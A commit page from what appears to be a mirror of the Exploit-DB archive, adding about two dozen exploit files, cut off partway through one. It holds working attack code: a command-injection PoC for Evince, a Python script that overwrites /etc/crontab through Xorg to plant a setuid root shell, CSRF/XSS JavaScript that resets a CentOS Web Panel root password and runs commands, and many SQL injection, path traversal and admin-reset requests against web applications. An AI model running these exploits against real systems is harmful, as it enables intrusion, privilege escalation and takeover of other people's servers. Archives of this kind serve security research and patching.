bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2018-11-14

Browse source 
24 changes to exploits/shellcodes

CuteFTP Mac 3.1 - Denial of Service (PoC)
Evince 3.24.0 - Command Injection
Cisco Immunet < 6.2.0 / Cisco AMP For Endpoints 6.2.0 - Denial of Service
XAMPP Control Panel 3.2.2 - Buffer Overflow (SEH) (Unicode)
xorg-x11-server < 1.20.1 - Local Privilege Escalation

Data Center Audit 2.6.2 - 'username' SQL Injection
Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
Wordpress Plugin Media File Manager 1.4.2 - Directory Traversal / Cross-Site Scripting
Paroiciel 11.20 - 'tRecIdListe' SQL Injection
The Don 1.0.1 - 'login' SQL Injection
Facturation System 1.0 - 'modid' SQL Injection
The Don 1.0.1 - 'login' SQL Injection
Facturation System 1.0 - 'modid' SQL Injection
GPS Tracking System 2.12 - 'username' SQL Injection
ServerZilla 1.0 - 'email' SQL Injection
GPS Tracking System 2.12 - 'username' SQL Injection
ServerZilla 1.0 - 'email' SQL Injection

Nominas 0.27 - 'username' SQL Injection
CentOS Web Panel 0.9.8.740 - Cross-Site Request Forgery / Cross-Site Scripting
Surreal ToDo 0.6.1.2 - SQL Injection
Surreal ToDo 0.6.1.2 - Local File Inclusion
Alienor Web Libre 2.0 - SQL Injection
Musicco 2.0.0 - Arbitrary Directory Download
Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)
Tina4 Stack 1.0.3 - SQL Injection / Database File Download
Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin)
Easyndexer 1.0 - Arbitrary File Download
ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)
Gumbo CMS 0.99 - SQL Injection
Silurus Classifieds Script 2.0 - 'wcategory' SQL Injection
ClipperCMS 1.3.3 - Cross-Site Request Forgery (File Upload)
Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload
Maitra Mail Tracking System 1.7.2 - SQL Injection / Database File Download
Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery (Add Admin)
Webiness Inventory 2.3 - SQL Injection
SIPve 0.0.2-R19 - SQL Injection

Linux/x86 - Bind (99999/TCP) NetCat Traditional (/bin/nc) Shell (/bin/bash) Shellcode (58 bytes)
This commit is contained in:
Offensive Security 2018-11-14 05:01:43 +00:00
parent 3a6748b9d9
commit 3a7153b2ac
26 changed files with 1566 additions and 8 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

22
exploits/linux/dos/45824.txt Normal file
View file

@ -0,0 +1,22 @@
# Exploit Title: evince command line injection
# Date: 2017-09-05
# Exploit Author: Matlink
# Vendor Homepage: https://wiki.gnome.org/Apps/Evince
# Software Link: https://wiki.gnome.org/Apps/Evince
# Version: 3.24.0
# Tested on: Debian sid
# CVE : CVE-2017-1000083
Can be tested on docker with https://github.com/matlink/evince-cve-2017-1000083
#! /bin/bash
# define the payload
export PAYLOAD="firefox google.com"
# Create the malicious .cbt file
dd if=/dev/zero of=" --checkpoint-action=exec=bash -c '$PAYLOAD;'.jpg" bs=1 count=512000
tar cvf poc.cbt *.jpg
# Run the malicious file
evince poc.cbt

89
exploits/linux/local/45832.py Executable file
View file

@ -0,0 +1,89 @@
# Exploit Title: xorg-x11-server < 1.20.1 - Local Privilege Escalation (RHEL 7)
# Date: 2018-11-07
# Exploit Author: @bolonobolo
# Vendor Homepage: https://www.x.org/
# Version: 1.19.5
# Tested on: RHEL 7.3 && 7.5
# CVE : CVE-2018-14665
# Explanation
# The only condition that have to be met for this PE to work via SSH, is that the legitimate non-root user
# has to be logged in trought console at the moment the PE script launched.
# In fact during the logged in session of the legitimate non-root user,
# a file with the name of the non-root user will be created in the /var/run/console folder.
# With that file present, the same non-root user can launch a Xorg command via SSH.
#
# Usage: $ python poc.py
# $ python poc.py
# [*] Waiting for bolo to connect to the console
# [*] OK --> bolo console opened
# [*] Building root shell wait 2 minutes
# [*] crontab overwritten
#
# ... cut Xorg output ...
#
# [*] Xorg killed
# (II) Server terminated successfully (0). Closing log file.
# [*] Don't forget to cleanup /etc/crontab and /tmp dir
# sh-4.2# id && whoami
# uid=0(root) gid=0(root) gruppi=0(root),1001(bolo)
# root
# sh-4.2#
#!/usr/bin/python
import os
import getpass
import subprocess
userList = []
path="/var/run/console/"
def getWhoami():
return getpass.getuser()
def getConsole(path):
p = subprocess.Popen(["ls", path], stdout=subprocess.PIPE)
(console, err) = p.communicate()
consoleList = str.splitlines(console)
return consoleList
def payload():
f = open("/tmp/payload", "w")
payload = ("cp /bin/sh /usr/local/bin/shell\n"
"echo \"#include <stdio.h> \" > /tmp/shell.c\n"
"echo \"#include <stdlib.h>\" >> /tmp/shell.c\n"
"echo \"#include <sys/types.h>\" >> /tmp/shell.c\n"
"echo \"#include <unistd.h>\" >> /tmp/shell.c\n"
"echo 'int main(){setuid(0);setgid(0);system(\"/bin/sh\");}' >> /tmp/shell.c\n"
"gcc /tmp/shell.c -o /usr/local/bin/shell\n"
"chmod 4777 /usr/local/bin/shell\n")
f.write(payload)
def executePayload():
os.system("chmod +x /tmp/payload")
os.system("cd /etc; Xorg -fp \"* * * * * root /tmp/payload\" -logfile crontab :1 &")
print "[*] crontab overwritten"
os.system("sleep 5")
os.system("pkill Xorg")
print "[*] Xorg killed"
os.system("sleep 120")
return
def main():
whoami = getWhoami()
print "[*] Waiting for " + whoami + " to connect to the console"
i = 0
while (i == 0):
consoleList = getConsole(path)
for user in consoleList:
if user == whoami :
print "[*] OK --> " + user + " console opened"
i = 1
print "[*] Building root shell wait 2 minutes"
payload()
executePayload()
print "[*] Don't forget to cleanup /etc/crontab and /tmp dir"
os.system("/usr/local/bin/shell")
if __name__ == '__main__':
main()

23
exploits/macos/dos/45823.py Executable file
View file

@ -0,0 +1,23 @@
# Exploit Title: CuteFTP Mac 3.1 Denial of Service (PoC)
# Date: 2018-11-06
# Exploit Author: Yair Rodríguez Aparicio
# Vendor Homepage: https://www.globalscape.com/cuteftp
# Software Link: http://go.globalscape.com/download/cuteftp-macosx
# Version: 3.1
# Tested on: macOS High Sierra 10.13
# Steps to Produce the Crash:
# 1.- Run python code : python cute.py
# 2.- Open text.txt and copy content to clipboard
# 3.- Open CuteFTP Mac
# 4.- Clic on "Quick Connect"
# 4.- Paste clipboard on "Host", "User", "Password" and "Port"
# 5.- click on "Run"
# 6.- Crashed!
buffer = "\x41" * 2000
f = open("text.txt", "w")
f.write(buffer)
f.close()

58
exploits/php/webapps/45822.txt Normal file
View file

@ -0,0 +1,58 @@
# Title: CentOS Web Panel Root Account Takeover + Remote Command Execution <= v0.9.8.740
# Author: InfinitumIT (https://infinitumit.com.tr)
# Vendor Homepage: centos-webpanel.com
# Software Link: http://centos-webpanel.com/cwp-latest
# Version: Up to v0.9.8.740.
# CVE: CVE-2018-18773, CVE-2018-18772 and CVE-2018-18774.
#? Detailed: https://numanozdemir.com/respdisc/cwp.pdf
# Description:
# Attacker can change target server's root password and execute command, by CSRF vulnerability.
# Also, there is a XSS vulnerability, hacker can exploit the CSRF vulnerability by this XSS
# vulnerability and run bad-purposed JavaScript codes on administrator's browser.
# So, CSRF/XSS to full server takeover.
# How to Reproduce:
# Hacker can exploit this vulnerability (changing root password) by XSS or CSRF.
# Hacker will create a website and put those codes into source:
<script>
var url = "http://targetserver:2030/admin/index.php?module=rootpwd";
var params = "ifpost=yes&password1=newpassword&password2=newpassword";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);
</script>
# (Update newpassword as the password that you want to change.)
# If hacker wants to exploit this by CSRF, CWP administrator will click hacker's website.
# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website)
# http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/password.js></script>
# After exploiting, you can connect to server by Putty or access the CWP panel with the password
# that you have specified from 2030 port.
# The second vulnerability is remote command execution.
# Hacker can exploit this vulnerability (remote command execution) by XSS or CSRF too.
# Again, hacker will create a website and put those codes into source:
<script>
var url = "http://targetserver:2030/admin/index.php?module=send_ssh";
var params = "ssh+command=whoami";
var vuln = new XMLHttpRequest();
vuln.open("POST", url, true);
vuln.withCredentials = 'true';
vuln.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
vuln.send(params);
</script>
# (Update whoami as command that you want to run.)
# Same logic like top, if hacker wants to exploit this by CSRF, CWP administrator will click hacker's website.
# But if hacker wants to exploit this by XSS, CWP administrator will click here: (admin's own website)
# http://targetserver:2030/admin/index.php?module=<script%20src=//hackerswebsite.com/command.js></script>
# shouldnt think that CSRF/XSS are unimportant vulnerabilities.
# for secure days...

50
exploits/php/webapps/45825.txt Normal file
View file

@ -0,0 +1,50 @@
# Exploit Title: Surreal ToDo 0.6.1.2 - SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/ajax.php?action=lists&page_id=[SQL]
#
GET /[PATH]/ajax.php?action=lists&page_id=1%20AND%201=1 HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:41:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1783
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/search=[SQL]
#
GET /[PATH]/?search=%27%20AND%201=1%20AND%20%27Efe%27%20LIKE%20%27Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:44:26 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 5284
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

30
exploits/php/webapps/45826.txt Normal file
View file

@ -0,0 +1,30 @@
# Exploit Title: Surreal ToDo 0.6.1.2 - Local File Inclusion
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://getsurreal.com/surrealtodo
# Software Link: https://netcologne.dl.sourceforge.net/project/surrealtodo/Surreal%20ToDo/surrealtodo_v0.6.1.2.zip
# Version: 0.6.1.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php?content=[FILE]
#
GET /[PATH]/index.php?content=../../../../Windows/win.ini HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Wed, 07 Nov 2018 23:58:36 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 1885
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

37
exploits/php/webapps/45827.txt Normal file
View file

@ -0,0 +1,37 @@
# Exploit Title: Alienor Web Libre 2.0 - SQL Injection
# Dork: N/A
# Date: 2018-11-08
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://alienor.org/
# Software Link: https://excellmedia.dl.sourceforge.net/project/alienorweblibre/alienorweblibre.zip
# Version: 2.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/index.php
#
POST /[PATH]/index.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=aehrspv1bfhbp1iqhkl1107vd7
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 306
identifiant=12'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'&mot_de_passe=&inventaire=Inventaire
HTTP/1.1 200 OK
Date: Thu, 08 Nov 2018 22:07:19 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 81
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

43
exploits/php/webapps/45830.txt Normal file
View file

@ -0,0 +1,43 @@
# Exploit Title: Musicco 2.0.0 - Arbitrary Directory Download
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://www.musicco.app/
# Software Link: https://codeload.github.com/micser/musicco/zip/master
# Version: 2.0.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/?getAlbum&parent=[Directory]&album=Efe
# /[PATH]/index.php
#3592 } elseif (isset($_GET['getAlbum'])) {
#3593 $parent = $_GET['parent'];
#3594 $album = $_GET['album'];
#3595 $rootPath = realpath($parent);
#3596 $zip = new ZipArchive();
#3597 $zip->open('./'.Musicco::getConfig('tempFolder').'/'.$album.'.zip', ZipArchive::CREATE | ZipArchive::OVERWRITE);
GET /[PATH]/?getAlbum&parent=../../../../Efe_S1/apache/conf&album=Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 14:24:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: musicco=rlparl6g67tsok72of1ln5tj23; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment;filename="Efe.zip"
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: application/zip, application/octet-stream

52
exploits/php/webapps/45831.txt Normal file
View file

@ -0,0 +1,52 @@
# Exploit Title: Data Center Audit 2.6.2 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/datacenteraudit/
# Software Link: https://netix.dl.sourceforge.net/project/datacenteraudit/data_center_audit_v262.zip
# Version: 2.6.2
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/dca_resetpw.php
#
POST /[PATH]/dca_resetpw.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 57
updateuser=admin&pass=efe&pass2=efe&submit_reset=VerAyari
HTTP/1.1 200 OK
Date: Fri, 09 Nov 2018 12:47:37 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Content-Length: 842
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/dca_resetpw.php
#
<html>
<body>
<form action="http://localhost/[PATH]/dca_resetpw.php" method="post">
Username:admin
<input name="updateuser" value="admin" type="hidden">
New Password:
<input name="pass" maxlength="10" type="password">
Confirm Password:
<input name="pass2" maxlength="10" type="password">
input name="submit_reset" value="Change Password" type="submit">
</table>
</form>
</body>
</html>

53
exploits/php/webapps/45833.txt Normal file
View file

@ -0,0 +1,53 @@
# Exploit Title: Tina4 Stack 1.0.3 - SQL Injection / Database File Download
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://tina4.com/
# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip
# Version: 1.0.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/kim.db
#
GET /[PATH]/kim.db HTTP/1.1
Host: TARGET:12345
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Server: nginx/1.7.7
Date: Fri, 09 Nov 2018 17:21:23 GMT
Content-Type: application/octet-stream
Content-Length: 22528
Last-Modified: Fri, 09 Nov 2018 17:09:46 GMT
Connection: keep-alive
Etag: "5be5bf5a-5800"
Accept-Ranges: bytes
#
view-source:kim.db / 3ˆ AdminAdminadmin$2y$10$ATw/7BHxoZezY0UfffIq3.zAn8bzP6NPBpmh9Qmk5e4X8HHOjLAba2018-11-09 15:25:24Active
#
<?php
$baglan = new SQLite3('kim.db');
$sonuc = $baglan->query('SELECT * FROM user');
while ($p = $sonuc->fetchArray()) {?>
<h4><?php echo $p['email'];?></h4>
<h4><?php echo $p['passwd'];?></h4>
<?php } ?>
# POC:
# 2)
# http://localhost/[PATH]/kim/menu/get/1 [SQL]
#

89
exploits/php/webapps/45834.txt Normal file
View file

@ -0,0 +1,89 @@
# Exploit Title: Tina4 Stack 1.0.3 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-11-09
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://tina4.com/
# Software Link: https://ayera.dl.sourceforge.net/project/tina4stack/v1.0.3/Release%20V1.0.3.zip
# Version: 1.0.3
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/kim/profile
#
POST /[PATH]/kim/profile HTTP/1.1
Host: TARGET:12345
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: TINA4=ov6d6tvb04jf1drutog305d3a0
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------2889126544277769229510236
Content-Length: 1183
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtUSER_ID"
1
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="MAX_FILE_SIZE"
4194304
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtPHOTO"; filename=""
Content-Type: application/octet-stream
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtFIRST_NAME"
Admin_Efe
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtLAST_NAME"
Admin_Efe
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtEMAIL"
admin_Efe
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtPASSWORD"
admin_Efe
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtSTATUS"
Active
-----------------------------2889126544277769229510236
Content-Disposition: form-data; name="txtCREATED"
2018-11-09 15:25:24
-----------------------------2889126544277769229510236--
HTTP/1.1 302 Found
Server: nginx/1.7.7
Date: Fri, 09 Nov 2018 17:05:44 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/7.0.0
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Location: /kim/profile
#/[PATH]/kim.db
#view-source: 3ˆ Admin_EfeAdmin_Efeadmin_Efe$2y$10$I6HLywdXPGjxy6XLZQ0uT.E/eKrlLQbyCwOlsuZZl75i.HGuWscRq2018-11-09 15:25:24Active
# POC:
# 2)
# http://localhost/[PATH]/kim/profile
#
<html>
<body>
<form method="post" action="http://localhost:12345/kim/profile" enctype="multipart/form-data">
<input placeholder="User Id" name="txtUSER_ID" id="txtUSER_ID" value="1" type="hidden">
<input name="MAX_FILE_SIZE" value="4194304" type="hidden">
<input name="txtPHOTO" id="txtPHOTO" onclick="" value="Photo" type="file">
<input placeholder="First Name" name="txtFIRST_NAME" id="txtFIRST_NAME" value="Admin" aria-required="true" aria-invalid="false" type="text">
<input placeholder="Last Name" name="txtLAST_NAME" id="txtLAST_NAME" value="Admin" type="text">
<input placeholder="Email" name="txtEMAIL" id="txtEMAIL" value="admin" type="text">
<input class="form-control" placeholder="Password" name="txtPASSWORD" id="txtPASSWORD" value="" type="password">
<select class="form-control" id="txtSTATUS" name="txtSTATUS"><option selected="selected" value="Active">Active</option><option value="Disabled">Disabled</option><option value="Suspended">Suspended</option></select>
<input placeholder="Created" name="txtCREATED" id="txtCREATED" value="2018-11-09 15:25:24" type="text">
<input value="Save" type="submit">
</form>
</body>
</html>

35
exploits/php/webapps/45835.txt Normal file
View file

@ -0,0 +1,35 @@
# Exploit Title: Easyndexer 1.0 - Arbitrary File Download
# Dork: N/A
# Date: 2018-11-10
# Exploit Author: Ihsan Sencan
# Vendor Homepage: https://sourceforge.net/projects/easyndexer/
# Software Link: https://ayera.dl.sourceforge.net/project/easyndexer/easyndexer_win32.exe
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/src/showtif.php?file=[FILE]&name=Efe
#
POST /[PATH]/src/showtif.php?file=C:/Windows/win.ini&name=Efe HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 18:07:43 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=du96l4lnqqcrmb8jamqk0ntib5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Disposition: attachment; filename=Efe.ini
Content-Length: 564
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/force-download

102
exploits/php/webapps/45836.txt Normal file
View file

@ -0,0 +1,102 @@
# Exploit Title: ABC ERP 0.6.4 - Cross-Site Request Forgery (Update Admin)
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://www.abc-erp.com/
# Software Link: https://netcologne.dl.sourceforge.net/project/abc-erp/abc_v_0_6_4.zip
# Version: 0.6.4
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# GET /[PATH]/admin/run/_configurar_perfil.php?usuario=efe&contrasena1=efe&contrasena2=efe&nombre=1&email=efe@omerefe.com&old_usuario=admin
#
# POC:
# 2)
# http://localhost/[PATH]/admin/run/_configurar_perfil.php
#
POST /[PATH]/admin/run/_configurar_perfil.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=
---------------------------3657142241469910112719562727
Content-Length: 770
-----------------------------3657142241469910112719562727
Content-Disposition: form-data; name="usuario"
admin
-----------------------------3657142241469910112719562727
Content-Disposition: form-data; name="contrasena1"
efe
-----------------------------3657142241469910112719562727
Content-Disposition: form-data; name="contrasena2"
efe
-----------------------------3657142241469910112719562727
Content-Disposition: form-data; name="nombre"
efe
-----------------------------3657142241469910112719562727
Content-Disposition: form-data; name="email"
efe@omerefe.com
-----------------------------3657142241469910112719562727
Content-Disposition: form-data; name="old_usuario"
admin
-----------------------------3657142241469910112719562727--
HTTP/1.1 302 Found
Date: Sat, 10 Nov 2018 22:48:37 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: PHPSESSID=q4h99gt9616juhb7qvkehf0u87; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Location: http://192.168.1.27/exploitdb/abc_v_0_6_4/?id=login
Content-Length: 187
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
# POC:
# 3)
# http://localhost/[PATH]/admin/run/_configurar_perfil.php
#
<html>
<body>
<form id="formulario" method="post" action="http://localhost/[PATH]/admin/run/_configurar_perfil.php" enctype="multipart/form-data">
<fieldset>
<legend>Datos del Usuario</legend>
<ol>
<li>
<label><strong>Usuario</strong></label>
<input name="usuario" id="nombre" size="15" value="admin" type="text">
</li>
<li>
<label>Contraseña</label>
<input name="contrasena1" size="10" value="" type="password"> (sólo se modificará si escribe algún valor)
</li>
<li>
<label>Contraseña (repetida)</label>
<input name="contrasena2" size="10" value="" type="password"> (sólo se modificará si escribe algún valor)
</li>
<li>
<label><strong>Nombre</strong></label>
<input name="nombre" size="20" value="" type="text">
</li>
<li>
<label><strong>E-mail</strong></label>
<input name="email" size="20" value="" type="text">
</li>
</ol>
</fieldset>
<fieldset class="submit">
<input name="old_usuario" value="admin" type="hidden">
<input value="Enviar" type="submit">
</fieldset>
</form>
</body>
</html>

38
exploits/php/webapps/45837.txt Normal file
View file

@ -0,0 +1,38 @@
# Exploit Title: Gumbo CMS 0.99 - SQL Injection
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
# Vendor Homepage: http://gumbo-cms.net/
# Software Link: https://netix.dl.sourceforge.net/project/gumbo-cms/0.99%20beta/gumbo-0.99beta.zip
# Version: 0.99
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# Users...
# http://localhost/[PATH]/settings/en
#
POST /[PATH]/settings/en HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: general_purpose=791f2pg746e79031nl9e69kjp2
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 268
language=fr2'||(SeleCT%20'Efe'%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||'
HTTP/1.1 200 OK
Date: Sat, 10 Nov 2018 23:49:54 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 710
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

34
exploits/php/webapps/45838.txt Normal file
View file

@ -0,0 +1,34 @@
# Exploit Title: Silurus Classifieds Script 2.0 - SQL Injection
# Dork: N/A
# Date: 2018-11-11
# Exploit Author: Ihsan Sencan
